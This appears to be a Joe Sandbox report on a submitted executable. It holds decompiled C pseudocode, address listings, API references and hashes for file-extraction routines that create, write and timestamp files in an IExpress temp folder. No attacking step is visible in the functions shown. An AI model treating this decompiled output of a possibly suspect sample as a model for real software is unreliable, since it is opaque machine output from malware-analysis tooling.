                                                                                                                                                                                                                                      							__eflags = _t39;
                                                                                                                                                                                                                                      						} while (_t39 != 0);
                                                                                                                                                                                                                                      						_t69 = _t71 - _t73;
                                                                                                                                                                                                                                      						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                                                      						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                      						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                      							L3:
                                                                                                                                                                                                                                      							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                                                      							goto L35;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t69 = 0x4091e4;
                                                                                                                                                                                                                                      						_t30 = E004046DC( &_v268, 0x4091e4,  *(_t75 + 4));
                                                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t41 = E00404747( &_v268, __eflags);
                                                                                                                                                                                                                                      						__eflags = _t41;
                                                                                                                                                                                                                                      						if(_t41 == 0) {
                                                                                                                                                                                                                                      							goto L9;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_push(0x180);
                                                                                                                                                                                                                                      						_t30 = E00404950( &_v268, 0x8302); // executed
                                                                                                                                                                                                                                      						_t75 = _t30;
                                                                                                                                                                                                                                      						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                                                      						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t30 = E004047BA( &_v268);
                                                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						 *0x4093f4 =  *0x4093f4 + 1;
                                                                                                                                                                                                                                      						_t33 = _t75;
                                                                                                                                                                                                                                      						goto L35;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					_t44 = _t36 - 1;
                                                                                                                                                                                                                                      					__eflags = _t44;
                                                                                                                                                                                                                                      					if(_t44 == 0) {
                                                                                                                                                                                                                                      						_t54 = 0x4091e4;
                                                                                                                                                                                                                                      						_t63 = 0x4091e4;
                                                                                                                                                                                                                                      						do {
                                                                                                                                                                                                                                      							_t45 =  *_t63;
                                                                                                                                                                                                                                      							_t63 =  &(_t63[1]);
                                                                                                                                                                                                                                      							__eflags = _t45;
                                                                                                                                                                                                                                      						} while (_t45 != 0);
                                                                                                                                                                                                                                      						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                                                      						_t64 = _t63 - 0x4091e5;
                                                                                                                                                                                                                                      						__eflags = _t64;
                                                                                                                                                                                                                                      						_t69 =  &(_t74[1]);
                                                                                                                                                                                                                                      						do {
                                                                                                                                                                                                                                      							_t46 =  *_t74;
                                                                                                                                                                                                                                      							_t74 =  &(_t74[1]);
                                                                                                                                                                                                                                      							__eflags = _t46;
                                                                                                                                                                                                                                      						} while (_t46 != 0);
                                                                                                                                                                                                                                      						_t73 = _t74 - _t69;
                                                                                                                                                                                                                                      						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                                                      						__eflags = _t30 - 0x104;
                                                                                                                                                                                                                                      						if(_t30 >= 0x104) {
                                                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t69 = 0x4091e4;
                                                                                                                                                                                                                                      						_t30 = E004046DC( &_v268, 0x4091e4,  *(_t75 + 4));
                                                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                                                      						_t30 = E00404C07( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						E00404B30( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                                                      						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                                                      						__eflags = _t50;
                                                                                                                                                                                                                                      						if(_t50 != 0) {
                                                                                                                                                                                                                                      							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                                                      							__eflags = _t51;
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							_t51 = 0x80;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                                                      							_t33 = 1;
                                                                                                                                                                                                                                      							goto L35;
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					_t30 = _t44 - 1;
                                                                                                                                                                                                                                      					__eflags = _t30;
                                                                                                                                                                                                                                      					if(_t30 == 0) {
                                                                                                                                                                                                                                      						goto L3;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				if(_a4 == 3) {
                                                                                                                                                                                                                                      					_t30 = E00404B30( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				goto L3;
                                                                                                                                                                                                                                      			}































                                                                                                                                                                                                                                      0x00404ca0
                                                                                                                                                                                                                                      0x00404cab
                                                                                                                                                                                                                                      0x00404cb0
                                                                                                                                                                                                                                      0x00404cb2
                                                                                                                                                                                                                                      0x00404cbe
                                                                                                                                                                                                                                      0x00404cc2
                                                                                                                                                                                                                                      0x00404cde
                                                                                                                                                                                                                                      0x00404cde
                                                                                                                                                                                                                                      0x00404ce1
                                                                                                                                                                                                                                      0x00404e53
                                                                                                                                                                                                                                      0x00404e58
                                                                                                                                                                                                                                      0x00404e66
                                                                                                                                                                                                                                      0x00404e66
                                                                                                                                                                                                                                      0x00404ce7
                                                                                                                                                                                                                                      0x00404ce7
                                                                                                                                                                                                                                      0x00404cea
                                                                                                                                                                                                                                      0x00404cff
                                                                                                                                                                                                                                      0x00404cff
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00404cff
                                                                                                                                                                                                                                      0x00404cec
                                                                                                                                                                                                                                      0x00404cec
                                                                                                                                                                                                                                      0x00404cef
                                                                                                                                                                                                                                      0x00404d9b
                                                                                                                                                                                                                                      0x00404da0
                                                                                                                                                                                                                                      0x00404da2
                                                                                                                                                                                                                                      0x00404dad
                                                                                                                                                                                                                                      0x00404dad
                                                                                                                                                                                                                                      0x00404db3
                                                                                                                                                                                                                                      0x00404db8
                                                                                                                                                                                                                                      0x00404dbd
                                                                                                                                                                                                                                      0x00404dbd
                                                                                                                                                                                                                                      0x00404dbf
                                                                                                                                                                                                                                      0x00404dc0
                                                                                                                                                                                                                                      0x00404dc0
                                                                                                                                                                                                                                      0x00404dc4
                                                                                                                                                                                                                                      0x00404dc4
                                                                                                                                                                                                                                      0x00404dc6
                                                                                                                                                                                                                                      0x00404dc9
                                                                                                                                                                                                                                      0x00404dcc
                                                                                                                                                                                                                                      0x00404dcc
                                                                                                                                                                                                                                      0x00404dce
                                                                                                                                                                                                                                      0x00404dcf
                                                                                                                                                                                                                                      0x00404dcf
                                                                                                                                                                                                                                      0x00404dd3
                                                                                                                                                                                                                                      0x00404dd8
                                                                                                                                                                                                                                      0x00404dda
                                                                                                                                                                                                                                      0x00404ddf
                                                                                                                                                                                                                                      0x00404cd3
                                                                                                                                                                                                                                      0x00404cd3
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00404cd3
                                                                                                                                                                                                                                      0x00404de8
                                                                                                                                                                                                                                      0x00404df0
                                                                                                                                                                                                                                      0x00404df5
                                                                                                                                                                                                                                      0x00404df7
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00404e03
                                                                                                                                                                                                                                      0x00404e08
                                                                                                                                                                                                                                      0x00404e0a
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00404e10
                                                                                                                                                                                                                                      0x00404e21
                                                                                                                                                                                                                                      0x00404e26
                                                                                                                                                                                                                                      0x00404e2b
                                                                                                                                                                                                                                      0x00404e2e
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00404e3a
                                                                                                                                                                                                                                      0x00404e3f
                                                                                                                                                                                                                                      0x00404e41
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00404e47
                                                                                                                                                                                                                                      0x00404e4d
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00404e4d
                                                                                                                                                                                                                                      0x00404cf5
                                                                                                                                                                                                                                      0x00404cf5
                                                                                                                                                                                                                                      0x00404cf8
                                                                                                                                                                                                                                      0x00404d06
                                                                                                                                                                                                                                      0x00404d0b
                                                                                                                                                                                                                                      0x00404d10
                                                                                                                                                                                                                                      0x00404d10
                                                                                                                                                                                                                                      0x00404d12
                                                                                                                                                                                                                                      0x00404d13
                                                                                                                                                                                                                                      0x00404d13
                                                                                                                                                                                                                                      0x00404d17
                                                                                                                                                                                                                                      0x00404d1a
                                                                                                                                                                                                                                      0x00404d1a
                                                                                                                                                                                                                                      0x00404d1c
                                                                                                                                                                                                                                      0x00404d1f
                                                                                                                                                                                                                                      0x00404d1f
                                                                                                                                                                                                                                      0x00404d21
                                                                                                                                                                                                                                      0x00404d22
                                                                                                                                                                                                                                      0x00404d22
                                                                                                                                                                                                                                      0x00404d26
                                                                                                                                                                                                                                      0x00404d2b
                                                                                                                                                                                                                                      0x00404d2d
                                                                                                                                                                                                                                      0x00404d32
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00404d37
                                                                                                                                                                                                                                      0x00404d3f
                                                                                                                                                                                                                                      0x00404d44
                                                                                                                                                                                                                                      0x00404d46
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00404d4c
                                                                                                                                                                                                                                      0x00404d54
                                                                                                                                                                                                                                      0x00404d59
                                                                                                                                                                                                                                      0x00404d5b
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00404d64
                                                                                                                                                                                                                                      0x00404d69
                                                                                                                                                                                                                                      0x00404d6e
                                                                                                                                                                                                                                      0x00404d71
                                                                                                                                                                                                                                      0x00404d7a
                                                                                                                                                                                                                                      0x00404d7a
                                                                                                                                                                                                                                      0x00404d73
                                                                                                                                                                                                                                      0x00404d73
                                                                                                                                                                                                                                      0x00404d73
                                                                                                                                                                                                                                      0x00404d85
                                                                                                                                                                                                                                      0x00404d8b
                                                                                                                                                                                                                                      0x00404d8d
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00404d93
                                                                                                                                                                                                                                      0x00404d95
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00404d95
                                                                                                                                                                                                                                      0x00404d8d
                                                                                                                                                                                                                                      0x00404cfa
                                                                                                                                                                                                                                      0x00404cfa
                                                                                                                                                                                                                                      0x00404cfd
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00404cfd
                                                                                                                                                                                                                                      0x00404cc8
                                                                                                                                                                                                                                      0x00404ccd
                                                                                                                                                                                                                                      0x00404cd2
                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 00404D85
                                                                                                                                                                                                                                      • SetDlgItemTextA.USER32(000203B8,00000837,?), ref: 00404DAD
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: AttributesFileItemText
                                                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                                                      • API String ID: 3625706803-816172423
                                                                                                                                                                                                                                      • Opcode ID: 14f29f1f6ff3725b3bcfc59f7257f8666539c1c4798d3fddb182016f0347fa6d
                                                                                                                                                                                                                                      • Instruction ID: 14ade2fcaf4a083656f17f978338f9704b1ff10cad5316d876b67c735f78b84a
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 14f29f1f6ff3725b3bcfc59f7257f8666539c1c4798d3fddb182016f0347fa6d
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8C4154B12046029ADB20AF38CD046F773A1AFC5304F04467BDA92B72D5DB39DE46D758
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                      			E00404C07(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                                                      				struct _FILETIME _v12;
                                                                                                                                                                                                                                      				struct _FILETIME _v20;
                                                                                                                                                                                                                                      				FILETIME* _t14;
                                                                                                                                                                                                                                      				int _t15;
                                                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t21 = __ecx * 0x18;
                                                                                                                                                                                                                                      				if( *((intOrPtr*)(_t21 + 0x408d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					_t14 =  &_v12;
                                                                                                                                                                                                                                      					_t15 = SetFileTime( *(_t21 + 0x408d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      			}








                                                                                                                                                                                                                                      0x00404c10
                                                                                                                                                                                                                                      0x00404c1a
                                                                                                                                                                                                                                      0x00404c5d
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00404c40
                                                                                                                                                                                                                                      0x00404c40
                                                                                                                                                                                                                                      0x00404c4e
                                                                                                                                                                                                                                      0x00404c56
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00404c5a

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 00404C24
                                                                                                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00404C36
                                                                                                                                                                                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 00404C4E
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: Time$File$DateLocal
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 2071732420-0
                                                                                                                                                                                                                                      • Opcode ID: 41704081f49c4a5a1341a0bc1af690a44d2e9e83c56eaeb2c55f986101956a3e
                                                                                                                                                                                                                                      • Instruction ID: a7bbbc52b7da08d488b7aa017b3f66a54b0147bf2188d7e5bf8d6be7490bcc7d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41704081f49c4a5a1341a0bc1af690a44d2e9e83c56eaeb2c55f986101956a3e
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FAF0B4B260530CAFEB14EBB4CD48DBF77ACEB85304704453BA627F1090EA34E964C669
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                                                      			E00404B30(char _a4) {
                                                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t1 =  &_a4; // 0x404f6f
                                                                                                                                                                                                                                      				_t15 =  *_t1 * 0x18;
                                                                                                                                                                                                                                      				if( *((intOrPtr*)(_t15 + 0x408d64)) != 1) {
                                                                                                                                                                                                                                      					_t9 = FindCloseChangeNotification( *(_t15 + 0x408d74)); // executed
                                                                                                                                                                                                                                      					if(_t9 == 0) {
                                                                                                                                                                                                                                      						return _t9 | 0xffffffff;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					 *((intOrPtr*)(_t15 + 0x408d60)) = 1;
                                                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0x408d60)) = 1;
                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0x408d68)) = 0;
                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0x408d70)) = 0;
                                                                                                                                                                                                                                      				 *((intOrPtr*)(_t15 + 0x408d6c)) = 0;
                                                                                                                                                                                                                                      				return 0;
                                                                                                                                                                                                                                      			}





                                                                                                                                                                                                                                      0x00404b36
                                                                                                                                                                                                                                      0x00404b36
                                                                                                                                                                                                                                      0x00404b44
                                                                                                                                                                                                                                      0x00404b68
                                                                                                                                                                                                                                      0x00404b70
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00404b7c
                                                                                                                                                                                                                                      0x00404b74
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x00404b74
                                                                                                                                                                                                                                      0x00404b48
                                                                                                                                                                                                                                      0x00404b4e
                                                                                                                                                                                                                                      0x00404b54
                                                                                                                                                                                                                                      0x00404b5a
                                                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • FindCloseChangeNotification.KERNELBASE(?,00000000,00000000,?,00404F6F,00000000), ref: 00404B68
                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: ChangeCloseFindNotification
                                                                                                                                                                                                                                      • String ID: oO@
                                                                                                                                                                                                                                      • API String ID: 2591292051-3187099477
                                                                                                                                                                                                                                      • Opcode ID: 81f8c292e8a167303dab4fee7506f6ace6dbeb9d23bbb5b0b049432824c4c0aa
                                                                                                                                                                                                                                      • Instruction ID: 878cc0fc68257adeab2047ec94447355d3251b7412d9db75c157a5cb71a5cd95
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 81f8c292e8a167303dab4fee7506f6ace6dbeb9d23bbb5b0b049432824c4c0aa
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 81F0FE71500B089EC7618E398E00A13BAE4AFE53603100A3FD5EEF21D0EB30A471DB9C
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                                                      			E00404854(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                                                      				void* _t7;
                                                                                                                                                                                                                                      				CHAR* _t11;
                                                                                                                                                                                                                                      				long _t18;
                                                                                                                                                                                                                                      				long _t23;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t11 = __ecx;
                                                                                                                                                                                                                                      				asm("sbb edi, edi");
                                                                                                                                                                                                                                      				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                                                      				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                                                      					asm("sbb esi, esi");
                                                                                                                                                                                                                                      					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                                                      						asm("sbb esi, esi");
                                                                                                                                                                                                                                      						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						_t23 = 1;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                                                      				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                                                      					return _t7;
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					E004048E6(_t11);
                                                                                                                                                                                                                                      					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      			}







                                                                                                                                                                                                                                      0x0040485a
                                                                                                                                                                                                                                      0x00404866
                                                                                                                                                                                                                                      0x0040486e
                                                                                                                                                                                                                                      0x0040487a
                                                                                                                                                                                                                                      0x004048a3
                                                                                                                                                                                                                                      0x004048a8
                                                                                                                                                                                                                                      0x0040487c
                                                                                                                                                                                                                                      0x00404882
                                                                                                                                                                                                                                      0x00404891
                                                                                                                                                                                                                                      0x00404896
                                                                                                                                                                                                                                      0x00404884
                                                                                                                                                                                                                                      0x00404886
                                                                                                                                                                                                                                      0x00404886
                                                                                                                                                                                                                                      0x00404882
                                                                                                                                                                                                                                      0x004048b8
                                                                                                                                                                                                                                      0x004048c1
                                                                                                                                                                                                                                      0x004048e5
                                                                                                                                                                                                                                      0x004048c8
                                                                                                                                                                                                                                      0x004048ca
                                                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                                                      0x004048dc

                                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                                      • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,004049F3,?,00404F35,*MEMCAB,00008000,00000180), ref: 004048B8
                                                                                                                                                                                                                                      • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,00404F35,*MEMCAB,00008000,00000180), ref: 004048DC
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000001.00000002.42326382778.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326362467.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326429612.0000000000408000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326452408.000000000040A000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      • Associated: 00000001.00000002.42326473389.000000000040C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_1_2_400000_l39HA25qjw.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                                                      • Opcode ID: fadf226ed69bbb41dbb50a9d93363128b59b8e1147c1ebbdb1745835005b5b17
                                                                                                                                                                                                                                      • Instruction ID: 68aa433c58a37d8e2ca109440795cca6d2e14e486405dc597069301a302bc1c0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: fadf226ed69bbb41dbb50a9d93363128b59b8e1147c1ebbdb1745835005b5b17
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 44014BEBE1557026F32460299C48FF7540CCBD6734F1A8A36BEAAFB2D1D6785C0491E8
                                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                                                      			E00404AA0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                                                      				int _t12;
                                                                                                                                                                                                                                      				signed int _t14;
                                                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                                                      				struct HWND__* _t21;
                                                                                                                                                                                                                                      				signed int _t24;
                                                                                                                                                                                                                                      				signed int _t25;
                                                                                                                                                                                                                                      
                                                                                                                                                                                                                                      				_t20 =  *0x40858c; // 0x104
                                                                                                                                                                                                                                      				_t9 = E00403670(_t20);
                                                                                                                                                                                                                                      				if( *0x4091d8 == 0) {
                                                                                                                                                                                                                                      					_push(_t24);
                                                                                                                                                                                                                                      					_t12 = WriteFile( *(0x408d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                                                      						_t25 = _a12;
                                                                                                                                                                                                                                      						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                                                      							_t14 =  *0x409400; // 0x1c1c0e
                                                                                                                                                                                                                                      							_t15 = _t14 + _t25;
                                                                                                                                                                                                                                      							 *0x409400 = _t15;
                                                                                                                                                                                                                                      							if( *0x408184 != 0) {
                                                                                                                                                                                                                                      								_t21 =  *0x408584; // 0x203b8
                                                                                                                                                                                                                                      								if(_t21 != 0) {
                                                                                                                                                                                                                                      									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0x4093f8, 0); // executed
                                                                                                                                                                                                                                      								}
                                                                                                                                                                                                                                      							}
                                                                                                                                                                                                                                      						}
                                                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                                                      						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                                                      					}
                                                                                                                                                                                                                                      					return _t25;
                                                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                                                      					return _t9 | 0xffffffff;
                                                                                                                                                                                                                                      				}
                                                                                                                                                                                                                                      			}











                                                                                                                                                                                                                                      0x00404aa5
                                                                                                                                                                                                                                      0x00404aab
                                                                                                                                                                                                                                      0x00404ab7
                                                                                                                                                                                                                                      0x00404abe
                                                                                                                                                                                                                                      0x00404ad5
                                                                                                                                                                                                                                      0x00404add
                                                                                                                                                                                                                                      0x00404ae4
                                                                                                                                                                                                                                      0x00404aea
                                                                                                                                                                                                                                      0x00404aec
                                                                                                                                                                                                                                      0x00404af1
                                                                                                                                                                                                                                      0x00404afa
                                                                                                                                                                                                                                      0x00404aff
                                                                                                                                                                                                                                      0x00404b01
                                                                                                                                                                                                                                      0x00404b09
